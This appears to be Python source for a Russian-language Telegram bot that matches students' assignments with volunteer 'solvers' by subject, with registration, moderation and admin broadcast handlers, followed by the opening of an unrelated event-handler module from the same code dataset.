text = '\\nНажмите:\\n' \\\n '\\nИзменить профиль - если Вы хотите поменять название ВУЗа, ' \\\n 'добавить или удалить какой-либо предмет📖 \\n\\n' \\\n 'Закрыть профиль - если Вы хотите прекратить быть Решалой как на какое-то время,' \\\n ' так и навсегда. Вы больше не сможете получать заказы, ' \\\n 'пока снова не захотите вернуться в ряды Решал и открыть профиль💪🏻 ' \\\n '\\nВсе ваши отзывы и оценки сохранятся.'\n await bot.send_message(user_id, text, reply_markup=Markup.key_profile_manage, parse_mode='HTML')\n await bot.send_message(user_id, refer_info)\n elif DB.dunno_exists(user_id):\n mess = 'Пока у вас обычный профиль заказчика.\\n' \\\n 'Хотите создать профиль исполнителя?'\n await bot.send_message(message.from_user.id, mess, reply_markup=Markup.choice_1)\n await bot.send_message(user_id, refer_info)\n else:\n await bot.send_message(message.from_user.id,\n 'Хм... кажется вы пропустили начальную регистрацию, пожалуйста нажмите /start')\n\n\n@dp.callback_query_handler(text_contains='profile_manage')\nasync def profile_manage(call: types.CallbackQuery):\n data_call = call.data.split(':')[-1]\n if data_call == 'make':\n await bot.send_message(call.from_user.id, \"Напишите ваш университет(сокращенно)\")\n await regist_decider.waiting_regist_univer.set()\n elif data_call == 'del':\n user_id = call.from_user.id\n profile_id = DB.get_profile_id(user_id)\n await bot.edit_message_text('Профиль закрыт', chat_id=config.profile_id, message_id=profile_id)\n DB.delete_user(user_id, sub=True)\n dict_values = {'decider': False,\n 'subject_count': 0}\n DB.update_in_user(user_id, dict_values)\n await call.message.edit_text('Ваш профиль решалы закрыт. Но вы всегда можете стать решалой, '\n 'для этого нажмите команду /my_profile. \\n'\n 'Если вас не устроил сервис, то можете написать об этом админам через команду '\n '/help_me',\n reply_markup=None)\n\n\n@dp.callback_query_handler(text_contains='profile_make', state=\"*\")\nasync def new_profile_make(call: types.CallbackQuery):\n # await bot.delete_message(call.from_user.id, call.message.message_id)\n data_call = call.data.split(':')[-1]\n if data_call == 'info':\n mess = ' Исполнитель - проще говоря Решала💪🏻\\n' \\\n '📌Через бота заказчик отправляет задание, которое поступает Вам сообщением в чат 📨. ' \\\n 'Сообщения приходят только по тем предметам, которые отмечены в Вашем профиле. ' \\\n 'Далее Вы уже решаете - соглашаетесь или отказываетесь от работы 🛠\\n\\n' \\\n 'Если заказчик выбрал Вас как Решалу, ' \\\n 'то он напишет Вам в личном порядке и задаст вопросы, интересующие его🧐\\n\\n' \\\n 'Хотите стать Решалой?💪🏻'\n await call.message.edit_text(mess, reply_markup=Markup.choice_2)\n elif data_call == 'yes':\n await call.message.edit_text('Создание профиля', reply_markup=None)\n await call.message.answer(\"Напишите ваш университет(сокращенно)\")\n await regist_decider.waiting_regist_univer.set()\n elif data_call == 'no':\n await call.message.edit_text('Вы отменили действие', reply_markup=None)\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['help'])\nasync def help(message: types.Message):\n # в зависимости от профиля выдавать разную инфу\n if message.from_user.id in DB.ban_users_list:\n await message.answer('https://www.youtube.com/watch?v=2Q_ZzBGPdqE')\n return\n mess = '📌Спасибо, что нажали. По статистике 67% людей не читают инструкцию, но не будем о грустном. \\n\\n' \\\n 'Ниже приведены функции бота:\\n\\n' \\\n '/send - основная функция бота для нахождения Решалы по какому-либо предмету 🤝\\n\\n' \\\n '/my_profile - показывает ваш статус и даёт возможность стать Решалой💪\\n\\n' \\\n '/info - в этой функции представлена подробная инструкция по поиску Решалы🔎\\n\\n' \\\n '/help_me - если у вас возникли проблемы, заметили ошибку или же просто хотите написать пожелания ' \\\n 'по улучшению бота🤖\\n' \\\n 'Администраторы прочитают его и ответят, когда появится возможность❤️' \\\n 'А еще у нас есть свои стикеры https://t.me/addstickers/reshals'\n\n await bot.send_message(message.chat.id, mess, parse_mode='html')\n mess = f'''Для пожертвования средств разработчикам: \\nтыкните для копирования \\n`{config.card_num}`'''\n await bot.send_message(message.chat.id, mess, parse_mode='markdown')\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['info'])\nasync def info(message: types.Message):\n if message.from_user.id in DB.ban_users_list:\n await message.answer('https://www.youtube.com/watch?v=2Q_ZzBGPdqE')\n return\n mess = 'Инструкция по работе с ботом:\\n\\n' \\\n 'Для нахождения Решалы по Вашему предмету, необходимо отправить задание боту:\\n\\n' \\\n '1. Нажмите на кнопку Меню и отправьте команду /send\\n' \\\n '2. Выберите предмет, по которому Вы хотите получить помощь🤝\\n' \\\n '3. Подробно распишите боту задание, интересующее Вас, ' \\\n 'и оправьте. При необходимости приложите фотографию или файл с заданием✉️\\n' \\\n '4. Как только на Ваше задание откликнутся ⏰ один или несколько Решал, ' \\\n 'Вам придет обратная связь с их ссылками, профилями и, возможно, комментарием по заданию.\\n' \\\n '5. Когда вы определились с Решалой, то нажмите Выбрать Решалу🚀\\n' \\\n '6. Вам необходимо перейти по ссылке выбранного Решалы🙋🏼 и, ' \\\n 'непосредственно, узнать все интересующие Вас вопросы напрямую.'\n if DB.decider_exists(message.from_user.id):\n mess += '\\n\\n\\nИнструкция для решал:\\n\\n' \\\n 'Когда к вам приходит заказ:\\n' \\\n '- Вы можете откликнуться, чтобы Вашу заявку могли рассмотреть. \\n' \\\n 'При отклике, Вы можете оставить свой комментарий по поводу заказа.\\n' \\\n '- Пожаловаться, если обнаружили неподобающий контент.\\n' \\\n 'Жалоба придет к администраторам и они её рассмотрят\\n\\n' \\\n 'После отправки Вашего профиля, к вам могут обратиться в личном сообщении'\n await bot.send_message(message.chat.id, mess, parse_mode='html')\n return\n mess += '\\n\\nТак же у вас есть возможность самому стать Решалой, ' \\\n 'для этого нажмите /my_profile и следуйте дальнейшим инструкциям'\n await bot.send_message(message.chat.id, mess, parse_mode='html')\n\n\n@dp.message_handler(commands=['helpa'])\nasync def helpa(message: types.Message):\n if await main_admin_test(message):\n await keyboard_admin(message)\n if await admins_test(message):\n mess = 'Команды для админов:\\n' \\\n '- Ответ определенному пользователю по id \\n' \\\n '/answer_user [id пользователя] текст сообщения \\n' \\\n '- Бан пользователя\\n' \\\n '/ban_user [id пользователя] \\n' \\\n '- Рассылка \\n' \\\n '/public \\n' \\\n '- Удаление пользователя \\n' \\\n '/delete_user id_user \\n' \\\n '- Получение статистики \\n' \\\n '/statistics'\n await message.answer(mess)\n\n\nclass send_help_me_state(StatesGroup):\n send_help = State()\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['help_me'])\nasync def help_me(message: types.Message):\n if message.from_user.id in DB.ban_users_list:\n await message.answer('Вы забанены!')\n return\n keyb = types.ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = ['Отмена']\n keyb.add(*buttons)\n await message.answer('Напишите сообщение техподдержке. Если хотите отменить отправку, напишите \"Отмена\"',\n reply_markup=keyb)\n await send_help_me_state.send_help.set()\n\n\n@dp.message_handler(state=send_help_me_state.send_help, content_types=['text'])\nasync def send_help_me(message: types.Message, state: FSMContext):\n if message.text.lower() == 'отмена':\n await bot.send_message(message.chat.id, 'Отправка отменена', reply_markup=types.ReplyKeyboardRemove())\n else:\n print(1)\n key = await Markup.ban_user(message.from_user.id)\n print(2)\n print(3)\n await bot.send_message(config.SUPPORT_ID,\n text=f'@{message.from_user.username} {message.from_user.id}',\n parse_mode='html',\n reply_markup=key)\n print(4)\n await bot.forward_message(chat_id=config.SUPPORT_ID,\n from_chat_id=message.from_user.id,\n message_id=message.message_id)\n print(5)\n await message.answer('Ваше сообщение отправлено админам,'\n 'в ближайшее время постараемся решить вашу проблему',\n reply_markup=types.ReplyKeyboardRemove())\n\n await state.finish()\n\n\nclass send_task(StatesGroup):\n choice_sub = State()\n give_task = State()\n\n\n@logger.catch()\n@rate_limit(limit=config.limit_send)\n@dp.message_handler(commands=['send'])\nasync def send(message: types.Message):\n if message.from_user.id in DB.ban_users_list:\n await message.answer('Вы забанены!')\n return\n elif not DB.user_exists(message.from_user.id):\n await bot.send_message(message.from_user.id,\n 'Хм... кажется вы пропустили начальную регистрацию, пожалуйста нажмите /start')\n elif message.chat.type == 'private':\n key = await Markup.subjects_task_with_see(config.all_subjects[1:])\n await message.answer('Выберите предмет', reply_markup=key)\n await send_task.choice_sub.set()\n else:\n await message.answer('Писать боту можно только в личку')\n\n\n@dp.callback_query_handler(text_contains='all_subjects_task', state=send_task.choice_sub)\nasync def keyboard_subjects_task(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n if data_call == 'see':\n keyboard_hide = await Markup.subjects_task_with_hide(config.all_subjects[1:])\n mess = config.info_subs_mess\n await call.message.edit_text(mess, reply_markup=keyboard_hide)\n elif data_call == 'hide':\n keyboard_see = await Markup.subjects_task_with_see(config.all_subjects[1:])\n mess = 'Выберите предмет'\n await call.message.edit_text(mess, reply_markup=keyboard_see)\n else:\n await state.update_data(sub=data_call)\n await call.message.edit_text(f'Вы выбрали {data_call}', reply_markup=None)\n await bot.send_message(call.from_user.id, 'Теперь пришлите задание одним сообщением. \\n'\n 'К сообщению можно прикрепить фотографию, документ, '\n 'или обойтись просто текстом с описанием задания.')\n await send_task.next()\n\n\n@dp.message_handler(state=send_task.give_task, content_types=['text', 'photo', 'document'])\nasync def give_task(message: types.Message, state: FSMContext):\n await state.update_data(task_message=message)\n await message.reply('Подтвердите отправку задания', reply_markup=Markup.confirm_task)\n\n\n@logger.catch()\n@dp.callback_query_handler(text_contains='confirm_task_from_user', state=send_task.give_task)\nasync def keyboard_subjects_task(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n user_id = call.from_user.id\n task_data = await state.get_data()\n if data_call == 'yes':\n send_list_id = DB.get_list_desiders(task_data['sub'])\n if len(send_list_id) == 0:\n mess = 'К сожалению, не нашлось решалы по этому предмету. '\n await call.message.edit_text(mess, reply_markup=None)\n else:\n DB.activity_users_dict['send'] += 1\n mess = f'Количество решал по вашему предмету: {len(send_list_id)} \\n' \\\n f'Как только кто-то отклинется на вашу задачу, я сразу же вам сообщу. ' \\\n f'На основе отзывов в канале вы сможете выбрать для себя лучшего решалу. \\n' \\\n f'Когда вы договоритесь с одним из решал, нажмите на кнопку \"Выбрать решалу\", ' \\\n f'чтобы сообщений по вашему заданию больше не приходило'\n await call.message.edit_text(mess, reply_markup=None)\n for i in send_list_id:\n if i not in DB.ban_users_list:\n try:\n key = await Markup.deciders_answer(id_dunno=task_data['task_message'].from_user.id,\n message_id=task_data['task_message'].message_id)\n await bot.send_message(chat_id=i, text=f'Задание по #{task_data[\"sub\"]}')\n await task_data['task_message'].send_copy(chat_id=i, reply_markup=key)\n await asyncio.sleep(0.1)\n except:\n pass\n if user_id in DB.to_do:\n DB.to_do[user_id].append(task_data['task_message'].message_id)\n else:\n DB.to_do[user_id] = [task_data['task_message'].message_id]\n\n await state.finish()\n elif data_call == 'no':\n await call.message.edit_text('Пришлите задание одним сообщением', reply_markup=None)\n return\n elif data_call == 'stop':\n await call.message.edit_text('Вы отменили отправку задния', reply_markup=None)\n await state.finish()\n\n\n@dp.callback_query_handler(text_contains='dunno_answer_data')\nasync def dunno_answer(call: types.CallbackQuery):\n data_call = call.data.split(':')\n task_message = int(data_call[3])\n id_dunno = int(data_call[2])\n action = data_call[1]\n if action == 'yes':\n await call.message.edit_reply_markup(reply_markup=None)\n await call.message.answer('По этому заданию вас больше не потревожат')\n DB.activity_users_dict['close'] += 1\n if task_message in DB.to_do[id_dunno]:\n DB.to_do[id_dunno].remove(task_message)\n pass\n\n\nclass deciders_answer_states(StatesGroup):\n send_comment = State()\n\n\n@dp.callback_query_handler(text_contains='deciders_answer_data')\nasync def deciders_answer(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')\n task_message = int(data_call[3])\n id_dunno = int(data_call[2])\n action = data_call[1]\n await state.update_data(task_message=task_message)\n await state.update_data(id_dunno=id_dunno)\n if action == 'yes':\n if bool(DB.to_do.get(id_dunno)):\n if task_message in DB.to_do.get(id_dunno):\n await call.message.edit_reply_markup(None)\n keyb = types.ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = ['Пропустить']\n keyb.add(*buttons)\n await call.message.answer('Напишите комментарий к отклику.\\n'\n 'Если не хотите писать комментарий, то напишите \"Пропустить\"',\n reply_markup=keyb)\n await deciders_answer_states.send_comment.set()\n else:\n await call.message.edit_text('К сожалению по этому заданию уже нашелся решала', reply_markup=None)\n else:\n await call.message.edit_text('К сожалению по этому заданию уже нашелся решала', reply_markup=None)\n\n elif action == 'prob':\n res = await call.message.edit_reply_markup(reply_markup=None)\n key = await Markup.ban_user(id_dunno)\n await bot.send_message(config.SUPPORT_ID, f'#Жалоба на `{id_dunno}`', parse_mode='markdown', reply_markup=key)\n await bot.forward_message(chat_id=config.SUPPORT_ID,\n from_chat_id=call.from_user.id,\n message_id=res.message_id)\n await call.message.edit_text('Сообщение с жалобой отправлено админам.')\n\n\n@dp.message_handler(state=deciders_answer_states.send_comment, content_types=['text'])\nasync def send_comment_decider(message: types.Message, state: FSMContext):\n keyb = types.ReplyKeyboardRemove()\n if message.text.lower() == 'пропустить':\n await message.answer('Ваш профиль отправлен пользователю', reply_markup=keyb)\n mess = f'@{message.from_user.username} откликнулся'\n else:\n await message.answer('Ваш комментарий и профиль отправлены пользователю', reply_markup=keyb)\n mess = f'@{message.from_user.username} откликнулся: \\n' \\\n f'{message.text}'\n user_data = await state.get_data()\n\n task_message = user_data.get('task_message')\n id_dunno = user_data.get('id_dunno')\n profile_id = DB.get_profile_id(message.from_user.id)\n await bot.forward_message(chat_id=id_dunno,\n from_chat_id=config.profile_id,\n message_id=int(profile_id))\n key = await Markup.dunno_answer(id_dunno=id_dunno, message_id=task_message)\n await bot.send_message(id_dunno,\n mess,\n reply_markup=key,\n reply_to_message_id=task_message)\n await state.finish()\n\n\n@dp.callback_query_handler(text_contains='dunno_clear_data')\nasync def dunno_clear_data(call: types.CallbackQuery):\n data_call = call.data.split(':')\n task_message = int(data_call[3])\n id_dunno = int(data_call[2])\n action = data_call[1]\n DB.to_do[id_dunno].remove(task_message)\n if action == 'yes':\n DB.activity_users_dict['close'] += 1\n elif action == 'think':\n DB.activity_users_dict['cancel'] += 1\n elif action == 'no':\n DB.activity_users_dict['no close'] += 1\n await call.message.edit_text('Спасибо за ответ', reply_markup=None)\n\n\n@dp.callback_query_handler(text_contains='ban_user_data')\nasync def make_ban_handler(call: types.CallbackQuery):\n data_call = call.data.split(':')\n id_dunno = int(data_call[2])\n action = data_call[1]\n key_ban = await Markup.ban_user(id_dunno)\n if action == 'ban':\n if id_dunno not in DB.ban_users_list:\n DB.ban(id_dunno, yes=True)\n key = await Markup.no_ban_user(id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} забанен', reply_markup=key)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'noban':\n DB.ban(id_dunno, no=True)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n elif action == 'ban_30':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на 30 минут', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на 30 минут')\n await ban_time(1800, id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'ban_1':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на 1 час', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на 1 час ')\n await ban_time(3600, id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'ban_1_day':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на 1 день', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на 1 день ')\n await ban_time(36000, id_dunno)\n await ban_time(36000, id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'ban_1_week':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на неделю', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на неделю ')\n for i in range(13):\n await ban_time(36000, id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n\n# ------------------- regist -------------------\nclass regist_decider(StatesGroup):\n waiting_regist_univer = State()\n waiting_regist_username = State()\n waiting_regist_subjects = State()\n waiting_end_regist = State()\n\n\n@dp.message_handler(state=regist_decider.waiting_regist_univer, content_types=types.ContentTypes.TEXT)\nasync def regist_univer(message: types.Message, state: FSMContext):\n if len(message.text) > 15:\n await message.answer('Текст не должен превышать 15 символов')\n return\n for i in ['!', '/', '@', '.', ',', '#', '$', '%', '*', '№']:\n if i in message.text:\n await message.answer('Текст не должен содержать лишних символов')\n return\n await state.update_data(univer=message.text)\n if message.from_user.username is None:\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['Сделал']\n key_regist.add(*buttons)\n await message.answer(\"Кажется у вас нет имени пользователя в telegram. \"\n \"Зайдите в настройки профиля и внесите имя пользователя, \"\n \"после этого можно продолжить регистрацию.\"\n \"\\n\\nИмя пользователя нужно для возможности связи с вами, \"\n \"если к вам обратятся за помощью по предмету.\",\n reply_markup=key_regist)\n else:\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['ДА', 'НЕТ']\n key_regist.add(*buttons)\n await message.answer(f'Ваше имя пользователя @{message.from_user.username},'\n f'Если вы согласны продолжить с ним, то нажмите кнопку \"ДА\". '\n f'Если желаете изменить, нажмите \"НЕТ\".',\n reply_markup=key_regist)\n await regist_decider.next()\n\n\n@dp.message_handler(state=regist_decider.waiting_regist_username, content_types=types.ContentTypes.TEXT)\nasync def regist_username(message: types.Message, state: FSMContext):\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['Сделал']\n key_regist.add(*buttons)\n if message.text.lower() == 'нет':\n await message.answer(\"Чтобы изменить имя пользователя в telegram. \"\n \"Зайдите в настройки профиля и смените имя пользователя, \"\n \"после этого можно продолжить регистрацию.\"\n \"\\n\\nИмя пользователя нужно для возможности связи с вами, \"\n \"если к вам обратятся за помощью по предмету.\",\n reply_markup=key_regist)\n return\n if message.from_user.username is None:\n\n await message.answer(f\"Сделайте имя пользователя. После этого напишите 'сделал'.\"\n f\"\\nОно будет исползоваться для возможности связи с вами, \"\n f\"если к вам обратятся за помощью по предмету.\",\n reply_markup=key_regist)\n else:\n keyboard_with_all_subjects = await Markup.keyboard_with_all_subjects_with_see(config.all_subjects[1:])\n keyb = types.ReplyKeyboardRemove()\n await message.answer(f\"Имя пользователя: @{message.from_user.username}\", reply_markup=keyb)\n await state.update_data(username='@' + message.from_user.username)\n await regist_decider.next()\n await state.update_data(subjects=[])\n await message.answer('Теперь выберите предметы, которые вам интересны. \\n'\n 'Выбирайте с умом, т.к. по выбранным предметам вам будут приходить уведомления'\n 'Также можете посмотреть расшифровку предметов👇',\n reply_markup=keyboard_with_all_subjects)\n\n\n@dp.callback_query_handler(text_contains='give_all_subjects', state=regist_decider.waiting_regist_subjects)\nasync def give_subjects_info(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n if data_call == 'see':\n keyboard_hide = await Markup.keyboard_with_all_subjects_with_hide(config.all_subjects[1:])\n mess = config.info_subs_mess\n await call.message.edit_text(mess, reply_markup=keyboard_hide)\n elif data_call == 'hide':\n keyboard_see = await Markup.keyboard_with_all_subjects_with_see(config.all_subjects[1:])\n mess = 'Теперь выберите предметы, которые вам интересны. \\n' \\\n 'Также можете посмотреть расшифровку предметов👇'\n await call.message.edit_text(mess, reply_markup=keyboard_see)\n elif data_call == 'stop':\n user_data = await state.get_data()\n if len(user_data.get('subjects')) == 0:\n await call.answer(f'Пожалуйста выберите предмет')\n else:\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['Подтвердить', 'Начать заново', 'Отменить']\n key_regist.add(*buttons)\n await bot.send_message(call.from_user.id,\n f\"- Универ\\n{user_data.get('univer')} \\n\"\n f\"- Предметы\\n{', '.join(set(user_data.get('subjects')))} \\n\"\n f\"- Никнейм\\n{user_data.get('username')} \\n\",\n reply_markup=key_regist)\n await state.update_data(subjects=set(user_data.get('subjects')))\n await regist_decider.next()\n else:\n await call.answer(f'{data_call} добавлен')\n user_data = await state.get_data()\n subs = user_data.get('subjects')\n subs.append(data_call)\n await state.update_data(subjects=subs)\n\n\n# @dp.message_handler(state=regist_decider.waiting_regist_subjects, content_types=types.ContentTypes.TEXT)\n# async def regist_subjects(message: types.Message, state: FSMContext):\n# all_subjects = config.all_subjects[1:]\n# subs = message.text.lower().replace(' ', '').split(',')\n# for i in subs:\n# if i not in all_subjects:\n# await message.answer('Выберите предметы, нажав на кнопки')\n# return\n\n@logger.catch()\n@dp.message_handler(state=regist_decider.waiting_end_regist, content_types=types.ContentTypes.TEXT)\nasync def stop_regist(message: types.Message, state: FSMContext):\n user_id = message.from_user.id\n keyb = types.ReplyKeyboardRemove()\n if message.text.lower() == 'подтвердить':\n # добалве пользователя в базу\n profile_id = DB.get_profile_id(user_id)\n if bool(profile_id):\n res = profile_id\n were_decider = True\n else:\n res = await bot.send_message(config.profile_id, 'Создание нового профиля')\n res = res.message_id\n were_decider = False\n user_data = await state.get_data()\n dt = datetime.datetime.now(tz=config.tz)\n dict_values = {'decider': True,\n 'pay_date': dt,\n 'username': user_data.get('username'),\n 'end_pay_date': await give_date_subscription(dt, config.prob_pereod),\n 'univer': user_data.get('univer'),\n 'subject_count': len(user_data.get('subjects')),\n 'profile_id': int(res)}\n DB.update_in_user(user_id, dict_values)\n sub = user_data.get('subjects')\n if were_decider:\n DB.delete_user(user_id=user_id, sub=True)\n DB.new_row_subject_db(user_id, *sub)\n text = await give_profile_desider_text(user_id=user_id, chanel=True)\n await bot.edit_message_text(text, chat_id=config.profile_id, message_id=res)\n await bot.send_message(message.chat.id,\n text='Отлично! Ваш профиль со��ранен. '\n 'Теперь вы официально Решала! '\n 'Когда кому-то понадобится помощь '\n 'по вашим предметам, мы обязательно сообщим об этом.',\n reply_markup=keyb)\n await message.answer('А это ваш профиль в канале решал. '\n 'Когда вы будете откликаться на задания, '\n 'бот отправит ваш профиль заказчику для возможности связи с вами. '\n 'После успешной сделки, заказчик может оставить комментирий и реакцию под вашим профилем.')\n await bot.forward_message(chat_id=message.from_user.id,\n from_chat_id=config.profile_id,\n message_id=res, )\n await state.finish()\n elif message.text.lower() == 'начать заново':\n await bot.send_message(message.chat.id,\n text='Регистрация началась заново.\\n'\n 'Напишите ваш университет(сокращенно)',\n reply_markup=keyb)\n await regist_decider.waiting_regist_univer.set()\n elif message.text.lower() == 'отменить':\n await message.answer(\"Регистрация отменена\", reply_markup=keyb)\n await state.reset_state(with_data=False)\n await state.finish()\n else:\n await message.answer('Пожалуйста введите одно из предлагаемых вариантов')\n await regist_decider.waiting_regist_univer.set()\n\n\n# ---------------------------------------------------- admins ----------------------------------------------------\n@dp.message_handler(commands=['chat_info']) # main admin\nasync def chat_info(message: types.Message):\n if await main_admin_test(message):\n await bot.send_message(message.chat.id, message.chat.id)\n\n\n@dp.message_handler(commands=['dump']) # main admin\nasync def dump(message: types.Message):\n if await main_admin_test(message):\n await make_dump()\n\n\n@logger.catch()\n@dp.message_handler(commands=['restart_data']) # main admin\nasync def restart_data(message: types.Message):\n if await main_admin_test(message):\n DB.ban_users_list = DB.ban_list\n try:\n DB.close()\n DB.connect()\n await bot.send_message(config.admin_id, 'Перезагрузка завершена')\n except:\n await bot.send_message(config.admin_id, 'Ошибка перезагрузки')\n\n\n@dp.message_handler(commands=['answer_user']) # admins\nasync def answer_user(message: types.Message):\n if await admins_test(message):\n text = message.text.split()\n id_user = text[1]\n await bot.send_message(id_user, 'Сообщение от админов: ' + ' '.join(text[2:]))\n\n\n@logger.catch()\n@dp.message_handler(commands=['ban_user']) # admins\nasync def ban_user_command(message: types.Message):\n if await admins_test(message):\n text = message.text.split()\n id_user = text[1]\n key = await Markup.ban_user(id_user)\n await bot.send_message(config.SUPPORT_ID, f'Пользователь {id_user}', reply_markup=key)\n\n\nclass send_public(StatesGroup):\n choice_users = State()\n send_publication = State()\n confirm_publication = State()\n\n\n@dp.message_handler(commands=['public'])\nasync def public(message: types.Message):\n if await admins_test(message):\n keyb = Markup.keyboard_public()\n await message.answer('Кому отправить?', reply_markup=keyb)\n await send_public.choice_users.set()\n\n\n@dp.callback_query_handler(text_contains='choice_public', state=send_public.choice_users)\nasync def keyboard_choice_public(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n await call.message.edit_text(f'Вы выбрали {data_call}', reply_markup=None)\n await state.update_data(choice_users=data_call)\n await bot.send_message(call.from_user.id, 'Отправь публикацию')\n await send_public.send_publication.set()\n\n\n@dp.message_handler(state=send_public.send_publication, content_types=['text', 'photo', 'document'])\nasync def give_task(message: types.Message, state: FSMContext):\n await state.update_data(task_message=message)\n await message.reply('Подтвердите отправку', reply_markup=Markup.confirm_public)\n await send_public.confirm_publication.set()\n\n\n@dp.callback_query_handler(text_contains='confirm_public_from_user', state=send_public.confirm_publication)\nasync def keyboard_subjects_task(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n task_data = await state.get_data()\n if data_call == 'yes':\n await call.message.edit_text('Отправка', reply_markup=None)\n send_list_id = 0\n if task_data['choice_users'] == 'all':\n send_list_id = DB.all_list()\n elif task_data['choice_users'] == 'desider':\n deciders_list = (DB.cursor.execute('SELECT telegram_id FROM user WHERE decider = True')).fetchall()\n send_list_id = [x[0] for x in deciders_list]\n elif task_data['choice_users'] == 'dunno':\n dunnos_list = (DB.cursor.execute('SELECT telegram_id FROM user WHERE dunno = True AND decider = False')).fetchall()\n send_list_id = [x[0] for x in dunnos_list]\n # from tqdm.contrib.telegram import tqdm\n # for i in tqdm(send_list_id, token=config.token, chat_id=call.from_user.id):\n for i in send_list_id:\n try:\n await task_data['task_message'].send_copy(chat_id=i)\n await asyncio.sleep(0.1)\n except:\n pass\n await bot.send_message(call.from_user.id, 'Сообщения разосланы')\n await state.finish()\n elif data_call == 'no':\n await call.message.edit_text('Отправь публикацию', reply_markup=None)\n await send_public.send_publication.set()\n elif data_call == 'stop':\n await call.message.edit_text('Вы отменили отправку публикации', reply_markup=None)\n await state.finish()\n\n\n@dp.message_handler(commands=['statistics']) # admins\nasync def statistics(message: types.Message):\n if await admins_test(message):\n await send_statistic()\n\n\n@dp.message_handler(commands=['keyboard_stop']) # main admin\nasync def keyboard_stop(message: types.Message):\n if await main_admin_test(message):\n keyb = types.ReplyKeyboardRemove()\n await bot.send_message(message.chat.id, text='Выключение клавиатуры', reply_markup=keyb)\n\n\n@dp.message_handler(commands=['testing']) # main admin\nasync def testing(message: types.Message):\n if await main_admin_test(message):\n # await message.answer(f'[+]')\n # mem = memory_usage(-1, include_children=True, multiprocess=True)\n # mess = f'{mem} \\n\\n' \\\n # f'all = {np.sum(mem)}'\n # await message.answer(mess)\n for i in trange(1000000, token=config.token, chat_id=message.from_user.id):\n print(i)\n\n\n # all_list = DB.all_list()\n # for i in all_list:\n # DB.cursor.execute('DELETE FROM user WHERE telegram_id = ?', (i, ))\n # DB.cursor.execute('DELETE FROM subject WHERE telegram_id = ?', (i, ))\n # DB.conn.commit()\n # await bot.send_message(config.admin_id, 'База очищена')\n\n # await clear_to_do()\n # while True:\n # await asyncio.sleep(5)\n # await message.answer(f'{message.from_user.username} прошло не меньше 5 секунд')\n\n\n@logger.catch()\n@dp.message_handler(commands=['delete_user']) # admins\nasync def delete_user_command(message: types.Message):\n if await admins_test(message):\n text = message.text.split()\n id_user = int(text[1])\n profile_id = DB.get_profile_id(id_user)\n await bot.edit_message_text('Профиль удален', chat_id=config.profile_id, message_id=profile_id)\n DB.delete_user(user_id=id_user, user=True)\n if DB.decider_exists(message.from_user.id):\n DB.delete_user(user_id=id_user, sub=True)\n await bot.send_message(config.SUPPORT_ID, f'Пользователь {id_user} удален')\n\n\n# ---------------------------------------------------- RUN ----------------------------------------------------\n\nif __name__ == '__main__':\n executor.start_polling(dp, on_startup=start_bot, on_shutdown=stop_bot, skip_updates=False)\n","repo_name":"daniluck505/help_university_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":47869,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5132853914","text":"# -*- coding: utf-8 -*-\nimport abc\n\nimport peony.utils\n\nfrom .commands import Commands\nfrom .tasks import task\n\n\nclass EventHandler(task):\n def __init__(self, func, event, prefix=None, strict=False):\n super().__init__(func)\n\n self.prefix = prefix\n self.is_event = event\n\n if prefix is not None:\n self.command = Commands(prefix=prefix, strict=strict)\n\n def __call__(self, *args):\n argcount = self.__wrapped__.__code__.co_argcount\n\n if hasattr(self, \"command\"):\n args = (\n *args,\n self.command,\n )\n\n args = args[:argcount]\n return super().__call__(*args)\n\n def __repr__(self):\n return \"<{clsname}: event:{event} prefix:{prefix}>\".format(\n clsname=self.__class__.__name__, prefix=self.prefix, event=self.is_event\n )\n\n @classmethod\n def event_handler(cls, event, prefix=None, **values):\n def decorator(func):\n event_handler = cls(func=func, 